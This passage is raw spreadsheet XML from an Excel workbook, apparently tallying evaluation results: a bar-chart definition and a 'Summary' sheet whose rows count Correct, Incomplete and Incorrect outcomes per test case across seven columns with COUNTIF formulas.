              <a:srgbClr val="FFC7CE"/>
            </a:solidFill>
            <a:ln>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:invertIfNegative val="1"/>
          <c:val>
            <c:numRef>
              <c:f>Summary!$M$2:$M$25</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2</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a:ln>
                    <a:prstDash val="solid"/>
                  </a:ln>
                </c14:spPr>
              </c14:invertSolidFillFmt>
            </c:ext>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-F59A-4D99-8385-D208E151890A}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:overlap val="100"/>
        <c:axId val="10"/>
        <c:axId val="100"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="10"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="r"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US"/>
                  <a:t>Number of Test Cases</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="1"/>
        </c:title>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="100"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="1"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="100"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:majorGridlines/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US"/>
                  <a:t>Model</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="1"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="10"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="1"/>
    </c:legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>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5400000" cy="360000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10</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5400000" cy="3600000"/>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6"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="A2" sqref="A2:H26"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="35" customWidth="1"/>
    <col min="2" max="13" width="20" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>8</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>17</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>21</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>25</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>29</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>33</v>
      </c>
      <c r="I1" s="1" t="s">
        <v>229</v>
      </c>
      <c r="J1" s="1" t="s">
        <v>230</v>
      </c>
      <c r="K1" s="1" t="s">
        <v>9</v>
      </c>
      <c r="L1" s="1" t="s">
        <v>231</v>
      </c>
      <c r="M1" s="1" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="2" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>7</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>231</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>232</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>232</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>232</v>
      </c>
      <c r="F2" s="2" t="s">
        <v>232</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>231</v>
      </c>
      <c r="H2" s="2" t="s">
        <v>231</v>
      </c>
      <c r="I2" s="2">
        <f t="shared" ref="I2:I25" si="0">COUNTIF(B2:H2,"Correct")*2 + COUNTIF(B2:H2,"Incomplete")*1</f>
        <v>3</v>
      </c>
      <c r="J2" s="4">
        <f t="shared" ref="J2:J25" si="1">IF((K2+L2+M2)&gt;0, K2/(K2+L2+M2), 0)</f>
        <v>0</v>
      </c>
      <c r="K2" s="2">
        <f t="shared" ref="K2:K25" si="2">COUNTIF(B2:H2, "Correct")</f>
        <v>0</v>
      </c>
      <c r="L2" s="2">
        <f t="shared" ref="L2:L25" si="3">COUNTIF(B2:H2, "Incomplete")</f>
        <v>3</v>
      </c>
      <c r="M2" s="2">
        <f t="shared" ref="M2:M25" si="4">COUNTIF(B2:H2, "Incorrect")</f>
        <v>4</v>
      </c>
    </row>
    <row r="3" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>37</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>232</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>232</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>231</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>232</v>
      </c>
      <c r="G3" s="2" t="s">
        <v>232</v>
      </c>
      <c r="H3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I3" s="2">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="J3" s="4">
        <f t="shared" si="1"/>
        <v>0.2857142857142857</v>
      </c>
      <c r="K3" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="L3" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M3" s="2">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="4" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>45</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>232</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>231</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>231</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>232</v>
      </c>
      <c r="G4" s="3" t="s">
        <v>232</v>
      </c>
      <c r="H4" s="2" t="s">
        <v>232</v>
      </c>
      <c r="I4" s="2">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="J4" s="4">
        <f t="shared" si="1"/>
        <v>0.14285714285714285</v>
      </c>
      <c r="K4" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L4" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M4" s="2">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="5" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>53</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>231</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>9</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>232</v>
      </c>
      <c r="G5" s="3" t="s">
        <v>231</v>
      </c>
      <c r="H5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I5" s="2">
        <f t="shared" si="0"/>
        <v>10</v>
      </c>
      <c r="J5" s="4">
        <f t="shared" si="1"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K5" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="L5" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M5" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>231</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>232</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>232</v>
      </c>
      <c r="G6" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H6" s="2" t="s">
        <v>232</v>
      </c>
      <c r="I6" s="2">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="J6" s="4">
        <f t="shared" si="1"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K6" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="L6" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M6" s="2">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="7" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>69</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>231</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>231</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>231</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>232</v>
      </c>
      <c r="G7" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I7" s="2">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
      <c r="J7" s="4">
        <f t="shared" si="1"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K7" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="L7" s="2">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="M7" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="F8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="G8" s="2" t="s">
        <v>231</v>
      </c>
      <c r="H8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I8" s="2">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="J8" s="4">
        <f t="shared" si="1"/>
        <v>0.8571428571428571</v>
      </c>
      <c r="K8" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="L8" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M8" s="2">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A9" s="2" t="s">
        <v>85</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>231</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>232</v>
      </c>
      <c r="D9" s="3" t="s">
        <v>232</v>
      </c>
      <c r="E9" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>232</v>
      </c>
      <c r="G9" s="3" t="s">
        <v>232</v>
      </c>
      <c r="H9" s="2" t="s">
        <v>232</v>
      </c>
      <c r="I9" s="2">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="J9" s="4">
        <f t="shared" si="1"/>
        <v>0.14285714285714285</v>
      </c>
      <c r="K9" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L9" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M9" s="2">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="10" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A10" s="2" t="s">
        <v>93</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>9</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>9</v>
      </c>
      <c r="F10" s="2" t="s">
        <v>232</v>
      </c>
      <c r="G10" s="2" t="s">
        <v>9</v>
      </c>
      <c r="H10" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I10" s="2">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
      <c r="J10" s="4">
        <f t="shared" si="1"/>
        <v>0.8571428571428571</v>
      </c>
      <c r="K10" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="L10" s="2">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M10" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A11" s="2" t="s">
        <v>115</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>231</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>232</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>232</v>
      </c>
      <c r="E11" s="2" t="s">
        <v>9</v>
      </c>
      <c r="F11" s="2" t="s">
        <v>232</v>
      </c>
      <c r="G11" s="2" t="s">
        <v>232</v>
      </c>
      <c r="H11" s="2" t="s">
        <v>232</v>
      </c>
      <c r="I11" s="2">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="J11" s="4">
        <f t="shared" si="1"/>
        <v>0.14285714285714285</v>
      </c>
      <c r="K11" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L11" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M11" s="2">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="12" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A12" s="2" t="s">
        <v>123</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>231</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>232</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>232</v>
      </c>
      <c r="E12" s="2" t="s">
        <v>232</v>
      </c>
      <c r="F12" s="2" t="s">
        <v>232</v>
      </c>
      <c r="G12" s="2" t="s">
        <v>9</v>
      </c>
      <c r="H12" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I12" s="2">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="J12" s="4">
        <f t="shared" si="1"/>
        <v>0.2857142857142857</v>
      </c>
      <c r="K12" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="L12" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M12" s="2">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="13" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A13" s="2" t="s">
        <v>107</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>231</v>
      </c>
      <c r="D13" s="3" t="s">
        <v>231</v>
      </c>
      <c r="E13" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G13" s="3" t="s">
        <v>232</v>
      </c>
      <c r="H13" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I13" s="2">
        <f t="shared" si="0"/>
        <v>10</v>
      </c>
      <c r="J13" s="4">
        <f t="shared" si="1"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K13" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="L13" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M13" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A14" s="2" t="s">
        <v>131</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>231</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D14" s="2" t="s">
        <v>232</v>
      </c>
      <c r="E14" s="2" t="s">
        <v>9</v>
      </c>
      <c r="F14" s="2" t="s">
        <v>9</v>
      </c>
      <c r="G14" s="2" t="s">
        <v>231</v>
      </c>
      <c r="H14" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I14" s="2">
        <f t="shared" si="0"/>
        <v>10</v>
      </c>
      <c r="J14" s="4">
        <f t="shared" si="1"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K14" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="L14" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M14" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A15" s="2" t="s">
        <v>141</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>231</v>
      </c>
      <c r="D15" s="3" t="s">
        <v>232</v>
      </c>
      <c r="E15" s="3" t="s">
        <v>231</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>231</v>
      </c>
      <c r="G15" s="3" t="s">
        <v>231</v>
      </c>
      <c r="H15" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I15" s="2">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="J15" s="4">
        <f t="shared" si="1"/>
        <v>0.2857142857142857</v>
      </c>
      <c r="K15" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="L15" s="2">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="M15" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A16" s="2" t="s">
        <v>157</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>231</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>231</v>
      </c>
      <c r="F16" s="2" t="s">
        <v>9</v>
      </c>
      <c r="G16" s="2" t="s">
        <v>9</v>
      </c>
      <c r="H16" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I16" s="2">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
      <c r="J16" s="4">
        <f t="shared" si="1"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K16" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="L16" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M16" s="2">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A17" s="2" t="s">
        <v>149</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>231</v>
      </c>
      <c r="D17" s="3" t="s">
        <v>232</v>
      </c>
      <c r="E17" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G17" s="3" t="s">
        <v>231</v>
      </c>
      <c r="H17" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I17" s="2">
        <f t="shared" si="0"/>
        <v>10</v>
      </c>
      <c r="J17" s="4">
        <f t="shared" si="1"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K17" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="L17" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M17" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A18" s="2" t="s">
        <v>165</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>232</v>
      </c>
      <c r="C18" s="2" t="s">
        <v>232</v>
      </c>
      <c r="D18" s="2" t="s">
        <v>232</v>
      </c>
      <c r="E18" s="2" t="s">
        <v>232</v>
      </c>
      <c r="F18" s="2" t="s">
        <v>232</v>
      </c>
      <c r="G18" s="2" t="s">
        <v>232</v>
      </c>
      <c r="H18" s="2" t="s">
        <v>232</v>
      </c>
      <c r="I18" s="2">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J18" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K18" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L18" s="2">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M18" s="2">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
    </row>
    <row r="19" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A19" s="2" t="s">
        <v>173</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>231</v>
      </c>
      <c r="C19" s="2" t="s">
        <v>232</v>
      </c>
      <c r="D19" s="2" t="s">
        <v>232</v>
      </c>
      <c r="E19" s="2" t="s">
        <v>232</v>
      </c>
      <c r="F19" s="2" t="s">
        <v>232</v>
      </c>
      <c r="G19" s="2" t="s">
        <v>232</v>
      </c>
      <c r="H19" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I19" s="2">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="J19" s="4">
        <f t="shared" si="1"/>
        <v>0.14285714285714285</v>
      </c>
      <c r="K19" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L19" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M19" s="2">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="20" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A20" s="2" t="s">
        <v>181</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C20" s="2" t="s">
        <v>231</v>
      </c>
      <c r="D20" s="2" t="s">
        <v>232</v>
      </c>
      <c r="E20" s="2" t="s">
        <v>232</v>
      </c>
      <c r="F20" s="2" t="s">
        <v>232</v>
      </c>
      <c r="G20" s="2" t="s">
        <v>232</v>
      </c>
      <c r="H20" s="2" t="s">
        <v>232</v>
      </c>
      <c r="I20" s="2">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="J20" s="4">
        <f t="shared" si="1"/>
        <v>0.14285714285714285</v>
      </c>
      <c r="K20" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L20" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M20" s="2">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="21" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A21" s="2" t="s">
        <v>189</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C21" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D21" s="3" t="s">
        <v>232</v>
      </c>
      <c r="E21" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G21" s="3" t="s">
        <v>231</v>
      </c>
      <c r="H21" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I21" s="2">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="J21" s="4">
        <f t="shared" si="1"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K21" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="L21" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M21" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A22" s="2" t="s">
        <v>197</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>231</v>
      </c>
      <c r="C22" s="2" t="s">
        <v>231</v>
      </c>
      <c r="D22" s="3" t="s">
        <v>232</v>
      </c>
      <c r="E22" s="3" t="s">
        <v>232</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>231</v>
      </c>
      <c r="G22" s="3" t="s">
        <v>232</v>
      </c>
      <c r="H22" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I22" s="2">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="J22" s="4">
        <f t="shared" si="1"/>
        <v>0.14285714285714285</v>
      </c>
      <c r="K22" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L22" s="2">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="M22" s="2">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="23" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A23" s="2" t="s">
        <v>205</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>231</v>
      </c>
      <c r="C23" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D23" s="3" t="s">
        <v>232</v>
      </c>
      <c r="E23" s="3" t="s">
        <v>231</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>232</v>
      </c>
      <c r="G23" s="3" t="s">
        <v>231</v>
      </c>
      <c r="H23" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I23" s="2">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="J23" s="4">
        <f t="shared" si="1"/>
        <v>0.2857142857142857</v>
      </c>
      <c r="K23" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="L23" s="2">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="M23" s="2">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="24" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A24" s="2" t="s">
        <v>213</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="E24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="F24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="G24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="H24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I24" s="2">
        <f t="shared" si="0"/>
        <v>14</v>
      </c>
      <c r="J24" s="4">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K24" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="L24" s="2">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M24" s="2">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A25" s="2" t="s">
        <v>221</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="E25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="F25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="G25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="H25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I25" s="2">
        <f t="shared" si="0"/>
        <v>14</v>
      </c>
      <c r="J25" s="4">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
